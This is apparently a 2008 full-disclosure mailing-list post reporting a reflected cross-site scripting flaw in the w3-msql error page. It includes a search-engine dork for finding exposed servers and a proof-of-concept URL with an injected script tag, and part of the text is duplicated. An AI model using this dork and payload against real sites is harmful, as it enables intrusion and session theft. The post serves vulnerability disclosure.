xss in w3-msql error page
- From: vivek_infosec@xxxxxxxxx
- Date: 3 Jan 2008 14:11:28 -0000
A reflected xss flaw exists in the w3-msql error page.
google dork : "W3-mSQL Error! - Can't stat script file (/"
Just insert a script from the start of /
like if u get a URL like:-
http://localhost/cgi-bin/w3-msql/journal/ijcd/index.html
and the error page output as :-
W3-mSQL Error! - Can't stat script file (/journal/ijcd/index.html)
u can try this:-
A reflected xss flaw exists in the w3-msql error page.
google dork : "W3-mSQL Error! - Can't stat script file (/"
Just insert a script from the start of /
like if u get a URL like:-
http://localhost/cgi-bin/w3-msql/<script>alert('xss')</script>
to confirm the issue
- Prev by Date: Re: [Full-disclosure] Yet another Dialog Spoofing Vulnerability - Firefox Basic Authentication
- Next by Date: [ MDVSA-2008:1 ] - Updated wireshark packages fix multiple vulnerabilities
- Previous by thread: [security bulletin] HPSBGN02301 SSRT071508 rev.2 - HP Software Update Running on Windows, Remote Execution of Arbitrary Code, Gain Privileged Access
- Next by thread: [ MDVSA-2008:1 ] - Updated wireshark packages fix multiple vulnerabilities
- Index(es):